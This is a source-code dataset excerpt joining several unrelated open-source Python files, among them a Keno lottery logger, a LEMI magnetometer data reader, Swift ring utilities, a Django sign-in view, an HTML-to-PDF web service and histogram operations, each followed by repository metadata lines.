# Keno Data Logging - QuickKeno # KDL v1.5.2 - Python 3 Conversion # Last Edit Date: 1/9/2021 from urllib.request import urlopen import json import time def write_file(file_name, write_mode, file_text): text_file = open(file_name, write_mode) text_file.write(file_text) text_file.close() #get the keno json file ma_keno_json = urlopen("http://www.masslottery.com/data/json/search/dailygames/todays/15.json") #read from the json file json_string = ma_keno_json.read() #parse the json file so we can work with it parsed_json = json.loads(json_string) #get the min and max game and subtract them... #...so we can get total number of games to iterate over min_game = int(parsed_json['min']) max_game = int(parsed_json['max']) games = max_game - min_game #script loop while games > 0: #get info from "draws" section in json file + create error log orgOrder = parsed_json['draws'][games]['winning_num_org'] sortedOrder = parsed_json['draws'][games]['winning_num'] multiplier = parsed_json['draws'][games]['bonus'] multi_int = parsed_json['draws'][games]['bonus_value'] draw = parsed_json['draws'][games]['draw_id'] #split on dashes 19 times to split up the 20 numbers orgOrder_split = orgOrder.split('-', 19) #join the 20 numbers with commas to accomodate the csv orgOrder_join = ",".join(orgOrder_split) orgOrder_column = "\n".join(orgOrder_split) #a way to string together the data using my "write file" function, this #also turns everything into a string format so I can concatenate them. long_text = str(orgOrder_join + "," + orgOrder + "," + sortedOrder + "," + multiplier + "," + multi_int + "," + draw) + "\n" #also put the numbers in a single row for alternate file single_row = str(orgOrder_column + "\n") #write out to the files individually try: #format today's date for the filename and set it date = time.strftime("%Y-%m-%d") kenodbfile = "KenoFiles/Daily/kenodb" + str(date) + ".csv" #write a new daily file write_file(kenodbfile, "a+", long_text) #append to the master file write_file("KenoFiles/kenodbfull.csv", "a+", long_text) #append to the single column file write_file("KenoFiles/kenodbfull-1column.csv", "a+", single_row) #in case the user is running on demand, give success messages & log them print("Succesfully logged game #" + draw) vlog_string = "<font size='1px'><strong>Succesfully logged game:</strong> " + draw + " <strong>|</strong> </font>" + "\n" sys_log = "KenoFiles/SYSLOG.html" write_file(sys_log,"a+",vlog_string) except Exception as eW: error_date_eW = time.strftime("%Y-%m-%d-%I:%M %p") error_text_eW = str(eW) + " | " + "File Write Error" + " | " + error_date_eW + "<br \>" + "\n" sys_log = "KenoFiles/SYSLOG.html" log_html = "KenoFiles/LOG.html" html_text = """<button type="button" class="btn btn-danger">An error has occured while writing to one of the files. Check the log in /KenoFiles</button><br \>""" + "\n" write_file(sys_log,"a+",error_text_eW) write_file(log_html,"a+",html_text) print("An error has occured while writing to one of the files. Check the logs in /KenoFiles") break games = games - 1 #success - write to logs and print out in case this is an on demand run games = max_game - min_game success_date = time.strftime("%Y-%m-%d-%I:%M %p") log_html = "KenoFiles/LOG.html" sys_log = "KenoFiles/SYSLOG.html" success_html = "<center><div class='bg-success' style='border:1px solid green;'><strong><font color='green'> KenoDB completed successfully" + " | " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Total Games: " + str(games) + "</font></strong></div></center><br \>" + "\n" sys_success_html = """<button type="button" class="btn btn-success">KenoDB completed successfully""" + " | Date: " + success_date + " | Min Game: " + str(min_game) + " | Max Game: " + str(max_game) + " | Number Of Games: " + str(games) + "</button><br \>" + "\n" write_file(log_html,"a+",sys_success_html) write_file(sys_log,"a+",success_html) print("KenoDB completed successfully")
gpl-3.0
8,259,616,565,052,512,000
47.793103
313
0.643816
false
nephila/djangocms-blog
djangocms_blog/liveblog/migrations/0001_initial.py
1
2058
import django.db.models.deletion import filer.fields.image from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ("cms", "0013_urlconfrevision"), ("filer", "0003_thumbnailoption"), ] operations = [ migrations.CreateModel( name="Liveblog", fields=[ ( "cmsplugin_ptr", models.OneToOneField( parent_link=True, auto_created=True, primary_key=True, serialize=False, to="cms.CMSPlugin", on_delete=django.db.models.deletion.CASCADE, ), ), ("body", models.TextField(verbose_name="body")), ("publish", models.BooleanField(default=False, verbose_name="publish liveblog entry")), ( "image", filer.fields.image.FilerImageField( related_name="djangocms_blog_liveblog_image", on_delete=django.db.models.deletion.SET_NULL, verbose_name="image", blank=True, to="filer.Image", null=True, ), ), ( "thumbnail", models.ForeignKey( related_name="djangocms_blog_liveblog_thumbnail", on_delete=django.db.models.deletion.SET_NULL, verbose_name="thumbnail size", blank=True, to="filer.ThumbnailOption", null=True, ), ), ], options={ "verbose_name": "liveblog entry", "verbose_name_plural": "liveblog entries", }, bases=("cms.cmsplugin",), ), ]
bsd-3-clause
3,167,827,842,490,844,700
33.881356
103
0.420797
false
Mirantis/swift-encrypt
swift/common/ring/utils.py
1
2880
from collections import defaultdict def tiers_for_dev(dev): """ Returns a tuple of tiers for a given device in ascending order by length. :returns: tuple of tiers """ t1 = dev['zone'] t2 = "{ip}:{port}".format(ip=dev.get('ip'), port=dev.get('port')) t3 = dev['id'] return ((t1,), (t1, t2), (t1, t2, t3)) def build_tier_tree(devices): """ Construct the tier tree from the zone layout. The tier tree is a dictionary that maps tiers to their child tiers. A synthetic root node of () is generated so that there's one tree, not a forest. Example: zone 1 -+---- 192.168.1.1:6000 -+---- device id 0 | | | +---- device id 1 | | | +---- device id 2 | +---- 192.168.1.2:6000 -+---- device id 3 | +---- device id 4 | +---- device id 5 zone 2 -+---- 192.168.2.1:6000 -+---- device id 6 | | | +---- device id 7 | | | +---- device id 8 | +---- 192.168.2.2:6000 -+---- device id 9 | +---- device id 10 | +---- device id 11 The tier tree would look like: { (): [(1,), (2,)], (1,): [(1, 192.168.1.1:6000), (1, 192.168.1.2:6000)], (2,): [(2, 192.168.2.1:6000), (2, 192.168.2.2:6000)], (1, 192.168.1.1:6000): [(1, 192.168.1.1:6000, 0), (1, 192.168.1.1:6000, 1), (1, 192.168.1.1:6000, 2)], (1, 192.168.1.2:6000): [(1, 192.168.1.2:6000, 3), (1, 192.168.1.2:6000, 4), (1, 192.168.1.2:6000, 5)], (2, 192.168.2.1:6000): [(2, 192.168.2.1:6000, 6), (2, 192.168.2.1:6000, 7), (2, 192.168.2.1:6000, 8)], (2, 192.168.2.2:6000): [(2, 192.168.2.2:6000, 9), (2, 192.168.2.2:6000, 10), (2, 192.168.2.2:6000, 11)], } :devices: device dicts from which to generate the tree :returns: tier tree """ tier2children = defaultdict(set) for dev in devices: for tier in tiers_for_dev(dev): if len(tier) > 1: tier2children[tier[0:-1]].add(tier) else: tier2children[()].add(tier) return tier2children
apache-2.0
-1,470,004,698,661,708,500
31.359551
71
0.365625
false
mwillmott/techbikers
server/wsgi.py
1
1435
""" WSGI config for techbikers project. This module contains the WSGI application used by Django's development server and any production WSGI deployments. It should expose a module-level variable named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover this application via the ``WSGI_APPLICATION`` setting. Usually you will have the standard Django WSGI application here, but it also might make sense to replace the whole Django WSGI application with a custom one that later delegates to the Django one. For example, you could introduce WSGI middleware here, or combine a Django application with an application of another framework. """ import os # We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks # if running multiple sites in the same mod_wsgi process. To fix this, use # mod_wsgi daemon mode with each site in its own daemon process, or use # os.environ["DJANGO_SETTINGS_MODULE"] = "techbikers.settings" os.environ.setdefault("DJANGO_SETTINGS_MODULE", "server.settings.production") # This application object is used by any WSGI server configured to use this # file. This includes Django's development server, if the WSGI_APPLICATION # setting points here. from django.core.wsgi import get_wsgi_application application = get_wsgi_application() # Apply Sentry middleware. from raven.contrib.django.raven_compat.middleware.wsgi import Sentry application = Sentry(application)
mit
2,688,136,823,440,740,400
43.84375
79
0.794425
false
geomagpy/magpy
magpy/lib/format_lemi.py
1
19241
''' Path: magpy.lib.format_lemi Part of package: stream (read/write) Type: Input filter, part of read library PURPOSE: Auxiliary input filter for Lemi data. CONTAINS: isLEMIBIN: (Func) Checks if file is LEMI format binary file. readLEMIBIN: (Func) Reads current LEMI data format binary files. isLEMIBIN1: (Func) Checks if file is LEMI format data file. readLEMIBIN1: (Func) Reads outdated LEMI data format binary files. isLEMIHF: (Func) Checks if file is LEMI format data file. readLEMIHF: (Func) Reads outdated LEMI data format text files. DEPENDENCIES: None. CALLED BY: magpy.lib.magpy_formats ''' from __future__ import print_function from __future__ import unicode_literals from __future__ import absolute_import from __future__ import division from io import open from magpy.stream import * def h2d(x): ''' Hexadecimal to decimal (for format LEMIBIN2) Because the binary for dates is in binary-decimal, not just binary. ''' y = int(x/16)*10 + x%16 return y def isLEMIHF(filename): ''' Checks whether a file is ASCII Lemi txt file format. ''' try: temp = open(filename, 'rt').readline() except: return False try: elem = temp.split() if len(elem) == 13: try: testtime = datetime.strptime(elem[0]+'-'+elem[1]+'-'+elem[2],'%Y-%m-%d') except: return False else: return False except: return False #loggerlib.info("format_lemi: Found Lemi 10Hz ascii file %s." % filename) return True def isLEMIBIN1(filename): ''' Checks whether a file is Binary Lemi file format. ''' try: temp = open(filename, 'rb').read(32) data= struct.unpack('<4cb6B11Bcbbhhhb', temp) except: return False try: if not data[0].decode('ascii') == 'L': return False if not data[22].decode('ascii') in (['A','P']): return false except: return False #loggerlib.info("format_lemi: Found Lemi 10Hz binary file %s." % filename) return True def isLEMIBIN(filename): ''' Checks whether a file is Binary Lemi025 file format. (2nd format. Used at Conrad Observatory.) ''' try: temp = open(filename, 'rb').read(169) if temp[:20].decode('ascii').startswith("LemiBin"): return True else: data= struct.unpack('<4cb6B8hb30f3BcB6hL', temp) except: return False try: if not data[0].decode('ascii') == 'L': return False if not data[53].decode('ascii') in (['A','P']): return false except: return False print ("Reading a Lemi Binary format") #loggerlib.info("format_lemi: Found Lemi 10Hz binary file %s." % filename) return True def readLEMIHF(filename, headonly=False, **kwargs): ''' Reading IAGA2002 LEMI format data. ''' starttime = kwargs.get('starttime') endtime = kwargs.get('endtime') getfile = True fh = open(filename, 'rt') # read file and split text into channels stream = DataStream() array = [[] for key in KEYLIST] # Check whether header information is already present headers = {} data = [] key = None xpos = KEYLIST.index('x') ypos = KEYLIST.index('y') zpos = KEYLIST.index('z') t1pos = KEYLIST.index('t1') t2pos = KEYLIST.index('t2') var2pos = KEYLIST.index('var2') var3pos = KEYLIST.index('var3') # get day from filename (platform independent) # -------------------------------------- splitpath = os.path.split(filename) tmpdaystring = splitpath[1].split('.')[0] daystring = re.findall(r'\d+',tmpdaystring)[0] if len(daystring) > 8: daystring = daystring[:8] try: day = datetime.strftime(datetime.strptime(daystring, '%Y%m%d'),'%Y-%m-%d') # Select only files within eventually defined time range if starttime: if not datetime.strptime(day,'%Y-%m-%d') >= datetime.strptime(datetime.strftime(stream._testtime(starttime),'%Y-%m-%d'),'%Y-%m-%d'): getfile = False if endtime: if not datetime.strptime(day,'%Y-%m-%d') <= datetime.strptime(datetime.strftime(stream._testtime(endtime),'%Y-%m-%d'),'%Y-%m-%d'): getfile = False except: loggerlib.warning("readLEMIHF: Wrong dateformat in Filename %s." % filename) pass if getfile: loggerlib.info('readLEMIHF: Reading %s...' % (filename)) for line in fh: if line.isspace(): # blank line continue elif headonly: # skip data for option headonly continue else: #row = LineStruct() elem = line.split() tim = date2num(datetime.strptime(elem[0]+'-'+elem[1]+'-'+elem[2]+'T'+elem[3]+':'+elem[4]+':'+elem[5],'%Y-%m-%dT%H:%M:%S.%f')) #row.time = tim array[0].append(tim) array[xpos].append(float(elem[6])) array[ypos].append(float(elem[7])) array[zpos].append(float(elem[8])) if len(elem) > 8: try: array[t1pos].append(float(elem[9])) array[t2pos].append(float(elem[10])) array[var2pos].append(float(elem[11])) array[var3pos].append(float(elem[12])) except: pass headers['col-x'] = 'x' headers['unit-col-x'] = 'nT' headers['col-y'] = 'y' headers['unit-col-y'] = 'nT' headers['col-z'] = 'z' headers['unit-col-z'] = 'nT' if len(elem) > 8: headers['col-t1'] = 'Tsens' headers['unit-col-t1'] = 'C' headers['col-t2'] = 'Tel' headers['unit-col-t2'] = 'C' headers['col-var2'] = 'VCC' headers['unit-col-var2'] = 'V' headers['col-var3'] = 'Index' headers['unit-col-var3'] = '' else: headers = stream.header stream =[] fh.close() for idx,ar in enumerate(array): if len(ar) > 0: array[idx] = np.asarray(array[idx]) headers['DataFormat'] = 'Lviv-LEMI-Buffer' return DataStream([LineStruct()], headers, np.asarray(array).astype(object)) def readLEMIBIN(filename, headonly=False, **kwargs): ''' Function for reading current data format of LEMI data. KWARGS: tenHz: (bool) to use 10Hz data timeshift: (float) providing a time shift, which is added to PC time column (usually NTP) COMPLETE DATA STRUCTURE:'<4cb6B8hb30f3BcBcc5hL' --TAG: data[0:4] # L025 --TIME (LEMI): 2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10]) --T (sensor): data[11]/100. --T (electr.): data[12]/100. --BIAS: data[13],data[14],data[15] --BIAS FIELD: data[16]/400.,data[17]/400.,data[18]/400. --(EMPTY) data[19] --DATA1: data[20]*1000.,data[21]*1000.,data[22]*1000. --DATA2: data[23]*1000.,data[24]*1000.,data[25]*1000. --DATA3: data[26]*1000.,data[27]*1000.,data[28]*1000. --DATA4: data[29]*1000.,data[30]*1000.,data[31]*1000. --DATA5: data[32]*1000.,data[33]*1000.,data[34]*1000. --DATA6: data[35]*1000.,data[36]*1000.,data[37]*1000. --DATA7: data[38]*1000.,data[39]*1000.,data[40]*1000. --DATA8: data[41]*1000.,data[42]*1000.,data[43]*1000. --DATA9: data[44]*1000.,data[45]*1000.,data[46]*1000. --DATA10: data[47]*1000.,data[48]*1000.,data[49]*1000. --MODE: data[50] # Mode: 1, 2 or 3 --FLASH % FREE: data[51] --BATTERY (V): data[52] --GPS STATUS: data[53] # A (active) or P (passive) --(EMPTY) data[54] --TIME (PC): 2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61] ''' # Reading Lemi025 Binary format data. starttime = kwargs.get('starttime') endtime = kwargs.get('endtime') debug = kwargs.get('debug') getfile = True timeshift = kwargs.get('timeshift') gpstime = kwargs.get('gpstime') sectime = kwargs.get('sectime') #print "Reading LEMIBIN -- careful --- check time shifts and used time column (used during acquisition and read????)" timediff = [] ## Moved the following into acquisition if not timeshift: timeshift = 0.0 # milliseconds and time delay (PC-GPS) are already considered in acquisition if not gpstime: gpstime = False # if true then PC time will be saved to the sectime column and gps time will occupy the time column # Check whether its the new (with ntp time) or old (without ntp) format temp = open(filename, 'rb').read(169) if temp[:60].decode('ascii').startswith("LemiBin"): # current format sensorid = temp[:60].split()[1] sensorid = sensorid.decode('ascii') dataheader = True lemiformat = "current" packcode = '<4cb6B8hb30f3BcB6hL' linelength = 169 stime = True if debug: print ("SensorID", sensorid) else: # old format data = struct.unpack('<4cb6B8hb30f3BcBcc5hL', temp) if data[55] == 'L': dataheader = False lemiformat = "out-dated" packcode = '<4cb6B8hb30f3BcB' linelength = 153 stime = False elif data[0] == 'L' and data[55] != 'L': dataheader = False lemiformat = "current (without header)" packcode = '<4cb6B8hb30f3BcB6hL' linelength = 169 stime = True else: loggerlib.error("readLEMIBIN: Something, somewhere, went very wrong.") fh = open(filename, 'rb') stream = DataStream([],{}) array = [[] for key in KEYLIST] data = [] key = None theday = extractDateFromString(filename) try: if starttime: if not theday[-1] >= datetime.date(stream._testtime(starttime)): getfile = False if endtime: if not theday[0] <= datetime.date(stream._testtime(endtime)): getfile = False except: getfile = True if getfile: loggerlib.info("read: %s Format: Binary LEMI format (%s)." % (filename,lemiformat)) if dataheader == True: junkheader = fh.readline() stream.header['SensorID'] = sensorid loggerlib.info('readLEMIBIN: Reading %s...' % (filename)) stream.header['col-x'] = 'x' stream.header['unit-col-x'] = 'nT' stream.header['col-y'] = 'y' stream.header['unit-col-y'] = 'nT' stream.header['col-z'] = 'z' stream.header['unit-col-z'] = 'nT' stream.header['col-t1'] = 'Ts' stream.header['unit-col-t1'] = 'deg' stream.header['col-t2'] = 'Te' stream.header['unit-col-t2'] = 'deg' stream.header['col-var2'] = 'Voltage' stream.header['unit-col-var2'] = 'V' stream.header['col-str1'] = 'GPS-Status' timediff = [] line = fh.read(linelength) while len(line) > 0: try: data= struct.unpack(str(packcode),line) except Exception as e: loggerlib.warning('readLEMIBIN: Error reading data. There is probably a broken line.') loggerlib.warning('readLEMIBIN: Error string: "%s"' % e) loggerlib.warning('readLEMIBIN: Aborting data read.') line = '' bfx = data[16]/400. bfy = data[17]/400. bfz = data[18]/400. stream.header['DataCompensationX'] = bfx stream.header['DataCompensationY'] = bfy stream.header['DataCompensationZ'] = bfz # get GPSstate gpsstate = data[53] #if gpsstate == 'A': #if not sectime: if not gpsstate == 'P' or not sectime: # Verify these condiditions - particulary when comparing bufferfile and mqtt transmission time = datetime(2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10])) # Lemi GPS time sectime = datetime(2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61])+timedelta(microseconds=timeshift*1000.) # PC time timediff.append((date2num(time)-date2num(sectime))*24.*3600.) # in seconds else: try: time = datetime(2000+data[55],data[56],data[57],data[58],data[59],data[60],data[61])+timedelta(microseconds=timeshift*1000.) # PC time except: loggerlib.error("readLEMIBIN: Error reading line. Aborting read. (See docs.)") try: sectime = datetime(2000+h2d(data[5]),h2d(data[6]),h2d(data[7]),h2d(data[8]),h2d(data[9]),h2d(data[10])) # Lemi GPS time timediff.append((date2num(time)-date2num(sectime))*24.*3600.) # in seconds except: loggerlib.warning("readLEMIBIN: Could not read secondary time column.") #--------------------TODO-------------------------------------------- # This is usually an error that comes about during an interruption of data writing # that leads to only a partial line being written. Normal data usually follows if the # data logger starts up again within the same day. # ---> It can be remedied using an iterative search for the next appearing "L025" tag # in the binary data. See magpy/acquisition/lemiprotocol.py for an example of this # iterative search. #-------------------------------------------------------------------- xpos = KEYLIST.index('x') ypos = KEYLIST.index('y') zpos = KEYLIST.index('z') t1pos = KEYLIST.index('t1') t2pos = KEYLIST.index('t2') var2pos = KEYLIST.index('var2') str1pos = KEYLIST.index('str1') secpos = KEYLIST.index('sectime') for i in range(10): tim = date2num(time+timedelta(microseconds=(100000.*i))) array[0].append(tim) array[xpos].append((data[20+i*3])*1000.) array[ypos].append((data[21+i*3])*1000.) array[zpos].append((data[22+i*3])*1000.) array[t1pos].append(data[11]/100.) array[t2pos].append(data[12]/100.) array[var2pos].append(data[52]/10.) array[str1pos].append(data[53]) sectim = date2num(sectime+timedelta(microseconds=(100000.*i))) array[secpos].append(sectim) line = fh.read(linelength) fh.close() gpstime = True if gpstime and len(timediff) > 0: loggerlib.info("readLEMIBIN2: Time difference (in sec) between GPS and PC (GPS-PC): %f sec +- %f" % (np.mean(timediff), np.std(timediff))) print("Time difference between GPS and PC (GPS-PC):", np.mean(timediff), np.std(timediff)) if sectime: print("contains secondary time column with NTP time") for idx,ar in enumerate(array): if len(ar) > 0: array[idx] = np.asarray(array[idx]).astype(object) stream.header['DataFormat'] = 'Lviv-LEMI' return DataStream([LineStruct()], stream.header, np.asarray(array)) def readLEMIBIN1(filename, headonly=False, **kwargs): ''' Function for reading LEMI format data. NOTE: This function reads an outdated data format. Timeshift of ~0.3 seconds must be accounted for. (This timeshift is corrected for in current acquisition.lemiprotocol.) ''' starttime = kwargs.get('starttime') endtime = kwargs.get('endtime') debug = kwargs.get('debug') getfile = True fh = open(filename, 'rb') # read file and split text into channels stream = DataStream() array = [[] for key in KEYLIST] # Check whether header infromation is already present headers = {} data = [] key = None theday = extractDateFromString(filename) try: if starttime: if not theday[-1] >= datetime.date(stream._testtime(starttime)): getfile = False if endtime: if not theday[0] <= datetime.date(stream._testtime(endtime)): getfile = False except: # Date format not recognized. Need to read all files getfile = True if getfile: loggerlib.info('readLEMIBIN1: Reading %s' % (filename)) headers['col-x'] = 'x' headers['unit-col-x'] = 'nT' headers['col-y'] = 'y' headers['unit-col-y'] = 'nT' headers['col-z'] = 'z' headers['unit-col-z'] = 'nT' xpos = KEYLIST.index('x') ypos = KEYLIST.index('y') zpos = KEYLIST.index('z') t1pos = KEYLIST.index('t1') t2pos = KEYLIST.index('t2') line = fh.read(32) #print (line, len(line)) while len(line) > 0: data= struct.unpack("<4cb6B11Bcbbhhhb", line) data = [el.decode('ascii') if isinstance(el, basestring) else el for el in data] bfx = data[-4]/400. bfy = data[-3]/400. bfz = data[-2]/400. headers['DataCompensationX'] = bfx headers['DataCompensationY'] = bfy headers['DataCompensationZ'] = bfz headers['SensorID'] = line[0:4].decode('ascii') newtime = [] for i in range (5,11): newtime.append(h2d(data[i])) currsec = newtime[-1] newtime.append(0.0) for i in range (0,30): row = LineStruct() line = fh.read(16) data= struct.unpack('<3f2h', line) microsec = i/10. if microsec >= 2: secadd = 2. elif microsec >= 1: secadd = 1. else: secadd = 0. newtime[-1] = microsec-secadd newtime[-2] = currsec+secadd time = datetime(2000+newtime[0],newtime[1],newtime[2],newtime[3],newtime[4],int(newtime[5]),int(newtime[6]*1000000)) array[0].append(date2num(time)) array[xpos].append((data[0])*1000.) array[ypos].append((data[1])*1000.) array[zpos].append((data[2])*1000.) array[t1pos].append(data[3]/100.) array[t2pos].append(data[4]/100.) line = fh.read(32) fh.close() #print "Finished file reading of %s" % filename for idx,ar in enumerate(array): if len(ar) > 0: array[idx] = np.asarray(array[idx]).astype(object) headers['DataFormat'] = 'Lviv-LEMI-old' return DataStream([LineStruct()], headers, np.asarray(array))
bsd-3-clause
-1,418,573,490,651,415,800
35.235405
177
0.54467
false
murdej/h2pws
h2pws.py
1
2618
import time import BaseHTTPServer from urlparse import urlparse, parse_qs import subprocess import base64 import qrcode import qrcode.image.svg import cStringIO #1630-1800 HOST_NAME = 'localhost' # !!!REMEMBER TO CHANGE THIS!!! PORT_NUMBER = 8000 # Maybe set this to 9000. class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_HEAD(s): s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() def do_GET(s): """Respond to a GET request.""" s.send_response(200) s.send_header("Content-type", "text/html") s.end_headers() s.wfile.write("<html><head><title></title></head>") s.wfile.write("<body><p>Send html source by POST.</p>") # s.wfile.write("<p>You accessed path: %s</p>" % s.path) s.wfile.write("</body></html>") def do_POST(s): """Respond to a POST request.""" s.send_response(200) s.send_header("Content-type", "application/x-pdf") s.end_headers() # params url_params = parse_qs(urlparse(s.path).query) args = ["wkhtmltopdf"] for n in [ 'orientation', 'page-size', 'margin-bottom', 'margin-left', 'margin-right', 'margin-top' ]: if n in url_params: args += [ '--' + n, url_params[n][0] ] args += ["-", "-"] print args html = s.rfile.read(int(s.headers.getheader('content-length'))) # Replace "qr::xxxxxxxxxxxxxxxxx" to sql qr code if "qr-to-svg" in url_params : new_html = '' pos = 0 while True: begin_str = '"qr::' pos_a = html.find(begin_str, pos) if pos_a == -1: break # copy text before new_html += html[pos:pos_a] # extract src of QR code pos_a += len(begin_str) pos_b = html.find('"', pos_a + 1) qr_src = html[pos_a:pos_b] print "qr:src='" + qr_src + "'" # new_html += '[[' + qr_src + ']]' factory = qrcode.image.svg.SvgPathImage img = qrcode.make(qr_src, image_factory=factory) output = cStringIO.StringIO() img.save(output) svgb = 'data:image/svg+xml;base64,' + base64.b64encode(output.getvalue()) output.close() new_html += svgb pos = pos_b new_html += html[pos:] html = new_html p = subprocess.Popen(args, stdin=subprocess.PIPE, stdout=subprocess.PIPE) p.stdin.write(html) p.stdin.close() s.wfile.write(p.stdout.read()) p.wait() if __name__ == '__main__': server_class = BaseHTTPServer.HTTPServer httpd = server_class((HOST_NAME, PORT_NUMBER), MyHandler) print time.asctime(), "Server Starts - %s:%s" % (HOST_NAME, PORT_NUMBER) try: httpd.serve_forever() except KeyboardInterrupt: pass httpd.server_close() print time.asctime(), "Server Stops - %s:%s" % (HOST_NAME, PORT_NUMBER)
gpl-2.0
4,676,818,734,918,425,000
26
104
0.637128
false
texib/bitcoin-zoo
member/views.py
1
3349
from django.shortcuts import render from django.contrib.auth.models import User, Group from django.contrib.auth import login from django.contrib.auth import logout from django.contrib.auth import authenticate from django.http import HttpResponseRedirect from rest_framework import viewsets from rest_framework.authentication import SessionAuthentication, BasicAuthentication from rest_framework.permissions import IsAuthenticated from rest_framework.response import Response from rest_framework.views import APIView from serializer import UserSerializer, GroupSerializer from rest_framework import status from rest_framework import parsers from rest_framework import renderers from rest_framework_jwt import utils from rest_framework_jwt.authentication import JSONWebTokenAuthentication as jwt_auth from rest_framework_jwt.serializers import JSONWebTokenSerializer # userena from userena import views class UserViewSet(viewsets.ModelViewSet): """ API endpoint that allows users to be viewed or edited. """ authentication_classes = (BasicAuthentication, ) queryset = User.objects.all() serializer_class = UserSerializer class GroupViewSet(viewsets.ModelViewSet): """ API endpoint that allows groups to be viewed or edited. """ queryset = Group.objects.all() serializer_class = GroupSerializer def signup(request): ''' a simple overwritten the signup view ''' return views.signup(request, success_url='/home/') def signout(request): ''' ''' return views.signout(request, template_name='home.html') def signin(request): ''' ''' # this is a little trick to hack the userena signin function return views.signin(request, redirect_signin_function=lambda *arg: '/home/') class testSignin(APIView): ''' API View that receives a POST with a user's username and password. Returns a JSON Web Token that can be used for authenticated requests. ''' throttle_classes = () permission_classes = () authentication_classes = () parser_classes = (parsers.FormParser, parsers.JSONParser,) renderer_classes = (renderers.JSONRenderer,) serializer_class = JSONWebTokenSerializer jwt = jwt_auth() def post(self, request): ''' a known issue now... a segment fault happens if you login and then logout and login again.. ''' serializer = testSignin.serializer_class(data=request.DATA) if serializer.is_valid(): payload = utils.jwt_decode_handler(serializer.object['token']) user = self.jwt.authenticate_credentials(payload) # below is a tric for authenticate.. # due to the authentication in django -- it need username and password, # however, decode of jwt doesn't contain password. user.backend = 'django.contrib.auth.backends.ModelBackend' # user = authenticate(username=user, nopass=True) if user is not None: if user.is_active: login(request, user) return HttpResponseRedirect('/home/') else: raise Exception('user not active') else: raise Exception('not valid user') return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)
mit
-4,012,741,038,384,615,400
30.299065
84
0.693341
false
dnowatsc/Varial
varial/operations.py
1
23334
""" Operations on wrappers """ import array import __builtin__ import ctypes import collections import functools from ROOT import THStack, TGraphAsymmErrors import history import wrappers class OperationError(Exception): pass class TooFewWrpsError(OperationError): pass class TooManyWrpsError(OperationError): pass class WrongInputError(OperationError): pass class NoLumiMatchError(OperationError): pass def iterableize(obj): if isinstance(obj, collections.Iterable): return obj else: return [obj] def add_wrp_kws(func): """Pops 'wrp_kws' from given keywords and updates returned wrapper.""" @functools.wraps(func) def catch_wrp_kws(*args, **kws): wrp_kws = kws.pop('wrp_kws', {}) ret = func(*args, **kws) ret.__dict__.update(wrp_kws) return ret return catch_wrp_kws @add_wrp_kws @history.track_history def stack(wrps): """ Applies only to HistoWrappers. Returns StackWrapper. Checks lumi to be equal among all wrappers. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1,4) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1,3) 1 >>> h2.Fill(3,6) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=2.) >>> w3 = stack([w1, w2]) >>> w3.histo.Integral() 13.0 >>> w3.lumi 2.0 """ wrps = iterableize(wrps) stk_wrp = None lumi = 0. info = None sample = "" for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): # histo check raise WrongInputError( "stack accepts only HistoWrappers. wrp: " + str(wrp) ) if not stk_wrp: # stack init stk_wrp = THStack(wrp.name, wrp.title) lumi = wrp.lumi info = wrp.all_info() sample = wrp.sample elif lumi != wrp.lumi: # lumi check raise NoLumiMatchError( "stack needs lumis to match. (%f != %f)" % (lumi, wrp.lumi) ) if sample != wrp.sample: # add to stack sample = "" stk_wrp.Add(wrp.histo) if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) if not sample: del info["sample"] return wrappers.StackWrapper(stk_wrp, **info) @add_wrp_kws @history.track_history def sum(wrps): """ Applies only to HistoWrappers. Returns HistoWrapper. Adds lumi up. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1) 1 >>> h2.Fill(3) 2 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = sum([w1, w2]) >>> w3.histo.Integral() 3.0 >>> w3.lumi 5.0 """ wrps = iterableize(wrps) histo = None lumi = 0. info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "sum accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo) else: histo = wrp.histo.Clone() info = wrp.all_info() lumi += wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def diff(wrps): """ Applies only to HistoWrappers. Returns HistoWrapper. Takes lumi from first. >>> from ROOT import TH1I >>> h1 = TH1I("h1", "", 2, .5, 4.5) >>> h1.Fill(1, 2) 1 >>> w1 = wrappers.HistoWrapper(h1, lumi=2.) >>> h2 = TH1I("h2", "", 2, .5, 4.5) >>> h2.Fill(1) 1 >>> w2 = wrappers.HistoWrapper(h2, lumi=3.) >>> w3 = diff([w1, w2]) >>> w3.histo.Integral() 1.0 >>> w3.lumi 2.0 """ wrps = iterableize(wrps) histo = None lumi = 0. info = None for wrp in wrps: if not isinstance(wrp, wrappers.HistoWrapper): raise WrongInputError( "sum accepts only HistoWrappers. wrp: " + str(wrp) ) if histo: histo.Add(wrp.histo, -1.) else: histo = wrp.histo.Clone() info = wrp.all_info() lumi = wrp.lumi if not info: raise TooFewWrpsError( "At least one Wrapper must be provided." ) info["lumi"] = lumi return wrappers.HistoWrapper(histo, **info) @add_wrp_kws @history.track_history def merge(wrps): """ Applies only to HistoWrapper. Returns HistoWrapper. 